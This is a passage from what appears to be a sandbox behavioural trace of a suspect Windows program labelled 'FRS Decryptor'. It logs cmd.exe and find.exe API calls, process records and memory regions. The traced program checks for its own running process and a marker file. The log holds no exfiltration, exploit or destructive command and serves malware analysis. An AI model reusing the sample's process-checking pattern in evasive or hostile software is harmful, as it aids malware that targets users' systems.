(penv="=") returned 1 [0068.808] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.809] GetConsoleOutputCP () returned 0x1b5 [0068.809] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.809] GetUserDefaultLCID () returned 0x409 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xc2f8fc, cchData=128 | out: lpLCData="0") returned 2 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xc2f8fc, cchData=128 | out: lpLCData="0") returned 2 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xc2f8fc, cchData=128 | out: lpLCData="1") returned 2 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0068.810] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0068.810] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.811] GetConsoleTitleW (in: lpConsoleTitle=0xd24df8, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0068.811] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0068.811] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0068.811] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0068.812] _wcsicmp (_String1="find", _String2=")") returned 61 [0068.812] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0068.812] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0068.812] _wcsicmp (_String1="IF", _String2="find") returned 3 [0068.812] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0068.812] _wcsicmp (_String1="REM", _String2="find") returned 12 [0068.812] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0068.813] GetConsoleTitleW (in: lpConsoleTitle=0xc2f5f0, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.814] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0068.814] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0068.814] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0068.814] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0068.814] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0068.814] _wcsicmp (_String1="find", _String2="CD") returned 3 [0068.814] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0068.814] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0068.814] _wcsicmp (_String1="find", _String2="REN") returned -12 [0068.814] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0068.814] _wcsicmp (_String1="find", _String2="SET") returned -13 [0068.814] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0068.814] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0068.814] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0068.814] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0068.814] _wcsicmp (_String1="find", _String2="MD") returned -7 [0068.814] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0068.814] _wcsicmp (_String1="find", _String2="RD") returned -12 [0068.814] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0068.814] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0068.814] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0068.814] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0068.814] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0068.814] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0068.814] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0068.814] _wcsicmp (_String1="find", _String2="VER") returned -16 [0068.814] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0068.814] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0068.814] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0068.814] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0068.814] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0068.814] _wcsicmp (_String1="find", _String2="START") returned -13 [0068.814] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0068.814] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0068.814] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0068.814] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0068.815] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0068.815] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0068.815] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0068.815] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0068.815] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0068.815] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0068.815] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0068.815] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0068.815] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0068.815] _wcsicmp (_String1="find", _String2="CD") returned 3 [0068.815] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0068.815] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0068.815] _wcsicmp (_String1="find", _String2="REN") returned -12 [0068.815] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0068.815] _wcsicmp (_String1="find", _String2="SET") returned -13 [0068.815] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0068.815] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0068.815] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="MD") returned -7 [0068.815] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0068.815] _wcsicmp (_String1="find", _String2="RD") returned -12 [0068.815] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0068.815] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0068.815] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0068.815] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0068.815] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0068.815] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0068.815] _wcsicmp (_String1="find", _String2="VER") returned -16 [0068.815] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0068.815] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0068.815] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0068.815] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0068.815] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0068.815] _wcsicmp (_String1="find", _String2="START") returned -13 [0068.815] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0068.815] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0068.815] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0068.815] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0068.815] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0068.816] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0068.816] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0068.816] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0068.816] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0068.816] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0068.816] _wcsicmp (_String1="find", _String2="IF") returned -3 [0068.816] _wcsicmp (_String1="find", _String2="REM") returned -12 [0068.816] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0068.816] SetErrorMode (uMode=0x0) returned 0x0 [0068.816] SetErrorMode (uMode=0x1) returned 0x0 [0068.816] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd26188, lpFilePart=0xc2f0f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc2f0f4*="Desktop") returned 0x1c [0068.816] SetErrorMode (uMode=0x0) returned 0x1 [0068.817] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.817] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.823] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xc2ee80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc2ee80) returned 0xffffffff [0068.823] GetLastError () returned 0x2 [0068.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xc2ee80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc2ee80) returned 0xd25600 [0068.824] FindClose (in: hFindFile=0xd25600 | out: hFindFile=0xd25600) returned 1 [0068.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xc2ee80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc2ee80) returned 0xffffffff [0068.824] GetLastError () returned 0x2 [0068.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xc2ee80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc2ee80) returned 0xd25600 [0068.824] FindClose (in: hFindFile=0xd25600 | out: hFindFile=0xd25600) returned 1 [0068.824] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0068.824] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0068.824] GetConsoleTitleW (in: lpConsoleTitle=0xc2f37c, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.825] InitializeProcThreadAttributeList (in: lpAttributeList=0xc2f2a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc2f28c | out: lpAttributeList=0xc2f2a8, lpSize=0xc2f28c) returned 1 [0068.825] UpdateProcThreadAttribute (in: lpAttributeList=0xc2f2a8, dwFlags=0x0, Attribute=0x60001, lpValue=0xc2f294, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc2f2a8, lpPreviousValue=0x0) returned 1 [0068.825] GetStartupInfoW (in: lpStartupInfo=0xc2f2e0 | out: lpStartupInfo=0xc2f2e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8, hStdOutput=0x90, hStdError=0x10)) [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0068.825] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0068.826] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0068.826] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0068.827] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find \"n\" \"C:\\FRSDecryptor\\1.txt\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc2f230*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find \"n\" \"C:\\FRSDecryptor\\1.txt\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc2f27c | out: lpCommandLine="find \"n\" \"C:\\FRSDecryptor\\1.txt\"", lpProcessInformation=0xc2f27c*(hProcess=0x58, hThread=0x54, dwProcessId=0x8f4, dwThreadId=0x2f8)) returned 1 [0068.832] CloseHandle (hObject=0x54) returned 1 [0068.832] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0068.832] GetEnvironmentStringsW () returned 0xd242c8* [0068.832] FreeEnvironmentStringsA (penv="=") returned 1 [0068.832] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0068.867] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0xc2f214 | out: lpExitCode=0xc2f214*=0x1) returned 1 [0068.867] CloseHandle (hObject=0x58) returned 1 [0068.867] _vsnwprintf (in: _Buffer=0xc2f2fc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc2f21c | out: _Buffer="00000001") returned 8 [0068.867] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0068.867] GetEnvironmentStringsW () returned 0xd242c8* [0068.868] FreeEnvironmentStringsA (penv="=") returned 1 [0068.868] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0068.868] GetEnvironmentStringsW () returned 0xd242c8* [0068.868] FreeEnvironmentStringsA (penv="=") returned 1 [0068.868] DeleteProcThreadAttributeList (in: lpAttributeList=0xc2f2a8 | out: lpAttributeList=0xc2f2a8) [0068.868] _get_osfhandle (_FileHandle=1) returned 0x90 [0068.868] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 0 [0068.868] _get_osfhandle (_FileHandle=1) returned 0x90 [0068.868] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0068.868] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.868] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.868] SetConsoleInputExeNameW () returned 0x1 [0068.868] GetConsoleOutputCP () returned 0x1b5 [0068.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.868] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.869] exit (_Code=1) Process: id = "47" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xd18f000" os_pid = "0x8f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0x780" cmd_line = "find \"n\" \"C:\\FRSDecryptor\\1.txt\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2173 start_va = 0xed0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 2174 start_va = 0xef0000 end_va = 0xef1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 2175 start_va = 0xf00000 end_va = 0xf0efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 2176 start_va = 0xf10000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 2177 start_va = 0xf50000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2178 start_va = 0xf90000 end_va = 0xf93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 2179 start_va = 0xfa0000 end_va = 0xfa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 2180 start_va = 0xfb0000 end_va = 0xfb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 2181 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 2182 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2183 start_va = 0x7edf0000 end_va = 0x7ee12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edf0000" filename = "" Region: id = 2184 start_va = 0x7ee1b000 end_va = 0x7ee1bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee1b000" filename = "" Region: id = 2185 start_va = 0x7ee1c000 end_va = 0x7ee1cfff entry_point = 0x0 region_type = private name = "private_0x000000007ee1c000" filename = "" Region: id = 2186 start_va = 0x7ee1d000 end_va = 0x7ee1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee1d000" filename = "" Region: id = 2187 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2188 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2189 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2190 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2191 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 2192 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2193 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2194 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2195 start_va = 0xed0000 end_va = 0xedffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 2196 start_va = 0xee0000 end_va = 0xee3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 2197 start_va = 0xef0000 end_va = 0xef3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 2198 start_va = 0xfc0000 end_va = 0xfc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 2199 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 2200 start_va = 0xfe0000 end_va = 0x1022fff entry_point = 0xfe0000 region_type = mapped_file name = "ulib.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ulib.dll.mui") Region: id = 2201 start_va = 0x1030000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2202 start_va = 0x1140000 end_va = 0x11bdfff entry_point = 0x1140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2203 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 2204 start_va = 0x73660000 end_va = 0x73680fff entry_point = 0x73660000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 2205 start_va = 0x73da0000 end_va = 0x73daefff entry_point = 0x73da0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 2206 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2207 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2208 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2209 start_va = 0x7ecf0000 end_va = 0x7edeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecf0000" filename = "" Thread: id = 93 os_tid = 0x2f8 Process: id = "48" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6704000" os_pid = "0x95c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2213 start_va = 0x4c0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2214 start_va = 0x4e0000 end_va = 0x4e1fff 